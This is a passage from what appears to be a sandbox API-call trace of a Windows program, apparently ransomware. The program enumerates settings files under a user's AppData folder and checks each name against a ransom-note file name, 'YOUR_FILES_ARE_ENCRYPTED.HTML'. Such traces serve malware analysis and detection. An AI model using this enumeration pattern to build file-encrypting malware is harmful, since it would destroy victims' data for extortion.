pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms") returned 194 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms") returned=".settingcontent-ms" [0121.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x299431b7, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x299431b7, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", cAlternateFileName="AABC3F~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms") returned 192 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b59691, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29b59691, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x508, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", cAlternateFileName="AAB1AC~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms") returned 195 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29ec688d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29ec688d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x503, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", cAlternateFileName="AA7060~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms") returned 194 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a2120ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a2120ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", cAlternateFileName="AA3E7E~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms") returned 192 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a6602d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a6602d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", cAlternateFileName="AA04EB~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms") returned 194 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.645] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.645] PathFindExtensionW (pszPath="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a934e01, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a934e01, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", cAlternateFileName="AA469D~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms") returned 192 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms") returned=".settingcontent-ms" [0121.646] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa7aff2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2aa7aff2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", cAlternateFileName="AADDFE~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms") returned 196 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms") returned=".settingcontent-ms" [0121.646] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afba6bf, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2afba6bf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", cAlternateFileName="AAA6C3~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms") returned 206 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms") returned=".settingcontent-ms" [0121.646] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3c066a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", cAlternateFileName="AAE32A~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms") returned 198 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms") returned=".settingcontent-ms" [0121.646] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b4f1999, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b4f1999, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x516, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", cAlternateFileName="AAC020~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms") returned 196 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.646] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.646] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b969f9e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b969f9e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4eb, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", cAlternateFileName="AAF88B~1.SET")) returned 1 [0121.646] StrStrIW (lpFirst="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.646] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms") returned 189 [0121.646] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms") returned=".settingcontent-ms" [0121.647] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.647] PathFindExtensionW (pszPath="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms") returned=".settingcontent-ms" [0121.647] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bbcc5d4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2bbcc5d4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x507, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", cAlternateFileName="AA74A9~1.SET")) returned 1 [0121.647] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.647] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms") returned 195 [0121.647] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms") returned=".settingcontent-ms" [0121.647] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.647] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms") returned=".settingcontent-ms" [0121.647] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bde25fe, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2bde25fe, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", cAlternateFileName="AAFFA7~1.SET")) returned 1 [0121.647] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.647] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms") returned 182 [0121.647] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms") returned=".settingcontent-ms" [0121.647] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.647] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms") returned=".settingcontent-ms" [0121.647] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c043349, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c043349, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", cAlternateFileName="AAEEB2~1.SET")) returned 1 [0121.649] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.649] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms") returned 191 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.649] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c32594e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c32594e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", cAlternateFileName="AAB7CB~1.SET")) returned 1 [0121.649] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.649] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms") returned 188 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms") returned=".settingcontent-ms" [0121.649] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms") returned=".settingcontent-ms" [0121.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c4a300e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c4a300e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", cAlternateFileName="AA7198~1.SET")) returned 1 [0121.649] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.649] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms") returned 183 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms") returned=".settingcontent-ms" [0121.649] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.649] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms") returned=".settingcontent-ms" [0121.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c79dfda, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c79dfda, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", cAlternateFileName="AA516E~1.SET")) returned 1 [0121.650] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.650] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms") returned 190 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms") returned=".settingcontent-ms" [0121.650] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms") returned=".settingcontent-ms" [0121.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cc62cc6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2cc62cc6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", cAlternateFileName="AA0779~1.SET")) returned 1 [0121.650] StrStrIW (lpFirst="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.650] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms") returned 190 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.650] PathFindExtensionW (pszPath="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms") returned=".settingcontent-ms" [0121.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, 